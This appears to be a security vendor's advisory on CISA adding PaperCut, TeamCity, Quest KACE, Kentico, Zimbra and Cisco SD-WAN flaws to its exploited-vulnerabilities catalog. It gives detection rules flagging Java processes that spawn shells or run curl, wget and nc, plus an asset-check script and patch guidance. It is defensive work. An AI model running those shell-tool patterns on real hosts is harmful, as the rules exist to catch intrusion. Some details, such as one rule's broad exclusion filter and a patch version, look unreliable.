CISA KEV Alert: Active Exploitation of PaperCut, JetBrains TeamCity, Quest KACE, and Cisco SD-WAN

On April 20, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added eight critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. This addition signals confirmed active exploitation in the wild, affecting a broad spectrum of enterprise infrastructure ranging from print management and CI/CD servers to systems management appliances and SD-WAN controllers.

The inclusion of CVE-2023-27351 (PaperCut), CVE-2024-27199 (JetBrains TeamCity), and CVE-2025-32975 (Quest KACE) is particularly concerning due to their prevalence in enterprise environments and the severity of the impact—Remote Code Execution (RCE). The Cisco Catalyst SD-WAN Manager vulnerabilities (CVE-2026-20122, CVE-2026-20128, CVE-2026-20133) further expose critical network management layers to credential theft and unauthorized API access.

Defenders must treat these vulnerabilities as active incident triggers. Under Binding Operational Directive (BOD) 22-01, federal civilian executive branch (FCEB) agencies have strict deadlines to remediate these vulnerabilities; private sector organizations should align with this urgency to prevent ransomware or data extortion attempts.

Technical Analysis

The following vulnerabilities have been confirmed as exploited in the wild:

1. PaperCut NG/MF (CVE-2023-27351)

Type: Improper Authentication leading to RCE
Affected Component: PaperCut Application Server
Mechanism: An attacker can bypass authentication to execute arbitrary code on the underlying operating system. This vulnerability has been historically leveraged by ransomware operators (e.g., Bl00dy) to move laterally from IT infrastructure to domain controllers.

2. JetBrains TeamCity (CVE-2024-27199)

Type: Path Traversal
Affected Component: JetBrains TeamCity (On-Premise)
Mechanism: This path traversal vulnerability allows unauthenticated attackers to bypass authentication mechanisms and gain administrative control of the TeamCity server. Successful exploitation leads to full compromise of the CI/CD pipeline, allowing attackers to inject malicious code into software builds or steal developer secrets.

3. Quest KACE Systems Management Appliance (CVE-2025-32975)

Type: Improper Authentication / RCE
Affected Component: KACE SMA
Mechanism: Attackers can exploit improper authentication checks to execute arbitrary system commands. As KACE SMA is often used for deployment and patching, compromising this appliance provides an attacker with a "God-mode" view and control over managed endpoints.

4. Kentico Xperience (CVE-2025-2749)

Type: Path Traversal
Affected Component: Kentico Xperience CMS
Mechanism: Allows attackers to read or write files on the server via path traversal sequences. While often used for source code disclosure, it can lead to RCE if combined with other techniques or file upload vulnerabilities.

5. Synacor Zimbra Collaboration Suite (CVE-2025-48700)

Type: Cross-site Scripting (XSS)
Affected Component: ZCS Web Client
Mechanism: Reflected XSS allows attackers to execute arbitrary scripts in the context of a victim's browser. This is frequently used to steal session cookies or credentials, leading to account takeover.

6. Cisco Catalyst SD-WAN Manager (CVE-2026-20122, CVE-2026-20128, CVE-2026-20133)

Type: Incorrect Use of Privileged APIs, Recoverable Passwords, Sensitive Info Exposure
Affected Component: Cisco Catalyst SD-WAN Manager (formerly vManage)
Mechanism: These chained vulnerabilities expose the management plane. Attackers can abuse privileged APIs without authentication, retrieve passwords stored in recoverable formats, and exfiltrate sensitive configuration data. This provides a roadmap for attackers to pivot into the broader software-defined WAN fabric.

Detection & Response

Detection of these vulnerabilities requires identifying the web application exploitation process (often Java/Tomcat based) spawning unauthorized system shells or reading sensitive files. The following rules focus on the high-severity RCE vectors affecting PaperCut, JetBrains, Quest, and Cisco.

Sigma Rules

YAML

---
title: Potential Web Shell Execution via Java App Server
id: 8a4b2c1d-6e9f-4a3b-8c5d-1e2f3a4b5c6d
status: experimental
description: Detects Java-based web servers (PaperCut, TeamCity, KACE, SD-WAN) spawning Windows command shells or PowerShell, indicative of RCE exploitation.
references:
  - https://www.cisa.gov/news-events/alerts/2026/04/20/cisa-adds-eight-known-exploited-vulnerabilities-catalog
author: Security Arsenal
date: 2026/04/20
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\java.exe'
      - '\javaw.exe'
      - '\tomcat.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  filter_legit:
    # Filter based on common legitimate paths if necessary, but treat all Java->Shell as suspicious in this context
    CommandLine|contains:
      - 'C:\Program Files\PaperCut'
      - 'C:\Program Files\JetBrains'
      - 'C:\Program Files (x86)\Quest\'
      - 'vmanage'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate administrative debugging (rare)
level: critical
---
title: Unix/Linux Web Shell Execution via Java/Tomcat
id: 9b5c3d2e-7f0a-5b4c-9d6e-2f3a4b5c6d7e
status: experimental
description: Detects Java or Tomcat services spawning shells (bash/sh) on Linux, typical for exploitation of TeamCity, KACE, or Cisco SD-WAN Manager.
references:
  - https://www.cisa.gov/news-events/alerts/2026/04/20/cisa-adds-eight-known-exploited-vulnerabilities-catalog
author: Security Arsenal
date: 2026/04/20
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith:
      - '/java'
      - '/javaw'
      - '/tomcat'
      - '/jsvc'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/bin/dash'
    CommandLine|contains:
      - 'curl'
      - 'wget'
      - 'chmod'
      - 'nc '
  condition: selection
falsepositives:
  - Legitimate system maintenance scripts
level: high

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender

// Hunt for Java/Tomcat processes spawning shells or making network connections associated with C2
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("java.exe", "javaw.exe", "tomcat.exe", "java", "tomcat")
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "curl", "wget")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, CommandLine, InitiatingProcessCommandLine
| extend IOCPrefix = extract(@'(.*?)(papercut|teamcity|kace|vmanage)', 1, tolower(InitiatingProcessCommandLine))
| where isnotempty(IOCPrefix)

Velociraptor VQL

VQL — Velociraptor

-- Hunt for Java processes spawning suspicious child processes on Linux/Windows
SELECT Pid, Name, CommandLine, Exe, Username, Parent.Pid AS ParentPid, Parent.Name AS ParentName, Parent.Commandline AS ParentCmd
FROM pslist()
WHERE Parent.Name =~ 'java'
  AND Name =~ 'cmd|powershell|pwsh|bash|sh'
  AND (ParentCmd =~ 'PaperCut|TeamCity|KACE|vmanage|tomcat')

Remediation Script (PowerShell)

This script checks for the presence of vulnerable PaperCut, JetBrains TeamCity, and Quest KACE services on Windows endpoints to aid in asset identification.

PowerShell

# Check for vulnerable services presence (Asset Identification)
Write-Host "Scanning for vulnerable services related to CISA KEV (April 2026)..." -ForegroundColor Cyan

$VulnerableServices = @(
    @{Name="PaperCut Application Server"; Process="papercut"},
    @{Name="JetBrains TeamCity"; Process="TeamCity"},
    @{Name="Quest KACE SMA Agent"; Process="KACE"}
)

$Found = $false

foreach ($svc in $VulnerableServices) {
    # Check running processes
    $proc = Get-Process -ErrorAction SilentlyContinue | Where-Object { $_.ProcessName -like "*$($svc.Process)*" }
    
    # Check common installation paths
    $paths = @("C:\Program Files\$($svc.Process)*", "C:\Program Files (x86)\$($svc.Process)*")
    $pathExists = $false
    foreach ($p in $paths) {
        if (Test-Path $p) { $pathExists = $true }
    }

    if ($proc -or $pathExists) {
        Write-Host "[ALERT] Potential vulnerable installation found: $($svc.Name)" -ForegroundColor Red
        if ($proc) { Write-Host "  Running Process: $($proc.ProcessName) (PID: $($proc.Id))" }
        $Found = $true
    }
}

if (-not $Found) {
    Write-Host "No immediate indicators of these specific vulnerable applications found on this host." -ForegroundColor Green
}

Remediation

Immediate action is required to secure affected environments.

1. Patching & Updates

PaperCut NG/MF: Update to the latest version. Refer to PaperCut Security Advisory for specific fixed builds addressing CVE-2023-27351.
JetBrains TeamCity: Update to TeamCity 2023.05.3 or later.
Quest KACE SMA: Apply the latest security patches from Quest Support for CVE-2025-32975.
Kentico Xperience: Upgrade to the latest hotfix or version that mitigates CVE-2025-2749. Check the Kentico DevNet.
Synacor Zimbra: Apply the patch for CVE-2025-48700 via the Zimbra Administration panel or CLI.
Cisco Catalyst SD-WAN Manager: Update to a software release that fixes CVE-2026-20122, CVE-2026-20128, and CVE-2026-20133. Immediately rotate all API keys and passwords exposed on the appliance post-upgrade.

2. Network Isolation & Compensating Controls

If patching is not immediately possible:

Isolate Management Consoles: Place TeamCity, PaperCut, KACE, and Cisco SD-WAN Manager behind VPNs or Zero Trust Network Access (ZTNA) solutions. Do not expose these interfaces directly to the public internet.
Disable Unnecessary Services: If specific features (like file uploads or API endpoints) are not required, disable them via configuration settings.
Audit Accounts: Review administrative logs for these applications for unfamiliar logins or unusual configuration changes dating back to at least April 2026.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub